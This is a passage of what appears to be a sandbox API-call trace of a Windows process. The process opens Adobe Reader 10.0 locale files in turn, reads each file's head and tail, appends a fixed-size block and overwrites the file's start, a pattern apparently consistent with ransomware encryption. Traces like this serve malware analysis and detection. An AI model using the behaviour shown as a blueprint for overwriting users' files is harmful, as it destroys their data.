lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11c00 [0082.113] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11c00 [0082.123] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.124] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.124] CloseHandle (hObject=0x1cc) returned 1 [0082.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Search.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\search.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6000 [0082.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.125] ReleaseMutex (hMutex=0x168) returned 1 [0082.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.HUN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.HUN", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.HUN", lpUsedDefaultChar=0x0) returned 10 [0082.125] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5000 [0082.132] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5000 [0082.138] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.138] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.138] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.139] CloseHandle (hObject=0x1cc) returned 1 [0082.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Acroform.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\acroform.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6a200 [0082.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.140] ReleaseMutex (hMutex=0x168) returned 1 [0082.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.ITA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.ITA", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.ITA", lpUsedDefaultChar=0x0) returned 12 [0082.140] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.152] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x69200 [0082.152] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.163] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x69200 [0082.163] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.164] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.164] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.164] CloseHandle (hObject=0x1cc) returned 1 [0082.164] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\EScript.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\escript.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa200 [0082.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.165] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.165] ReleaseMutex (hMutex=0x168) returned 1 [0082.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.ITA", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.ITA", lpUsedDefaultChar=0x0) returned 11 [0082.165] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.179] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9200 [0082.179] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.190] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9200 [0082.190] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.191] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.191] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.191] CloseHandle (hObject=0x1cc) returned 1 [0082.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\reflow.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\reflow.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1200 [0082.192] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.192] ReleaseMutex (hMutex=0x168) returned 1 [0082.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.ITA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.ITA", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.ITA", lpUsedDefaultChar=0x0) returned 10 [0082.192] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0082.618] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0082.618] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0082.619] CloseHandle (hObject=0x1cc) returned 1 [0082.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Weblink.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\weblink.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.620] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.620] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e00 [0082.620] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.621] ReleaseMutex (hMutex=0x168) returned 1 [0082.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.ITA", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.ITA", lpUsedDefaultChar=0x0) returned 11 [0082.621] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.623] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e00 [0082.623] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.624] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e00 [0082.624] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.628] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.628] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.629] CloseHandle (hObject=0x1cc) returned 1 [0082.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\DVA.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\dva.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3600 [0082.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.630] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.631] ReleaseMutex (hMutex=0x168) returned 1 [0082.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.JPN", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0082.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.JPN", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.JPN", lpUsedDefaultChar=0x0) returned 7 [0082.631] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.633] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2600 [0082.634] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.635] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2600 [0082.635] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.635] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.635] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.636] CloseHandle (hObject=0x1cc) returned 1 [0082.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\RdLang32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\rdlang32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.637] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.637] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xf8e00 [0082.637] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.638] ReleaseMutex (hMutex=0x168) returned 1 [0082.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.JPN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.JPN", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.JPN", lpUsedDefaultChar=0x0) returned 12 [0082.638] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0082.645] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.646] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf7e00 [0082.646] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea96e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea96e8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.654] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xf7e00 [0082.655] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.656] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0082.656] WriteFile (in: hFile=0x1cc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0082.656] WriteFile (in: hFile=0x1cc, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.657] CloseHandle (hObject=0x1cc) returned 1 [0082.657] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Spelling.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\spelling.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0082.658] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.658] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2200 [0082.658] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0082.658] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.659] ReleaseMutex (hMutex=0x168) returned 1 [0082.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.JPN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.JPN", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.JPN", lpUsedDefaultChar=0x0) returned 12 [0082.659] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, 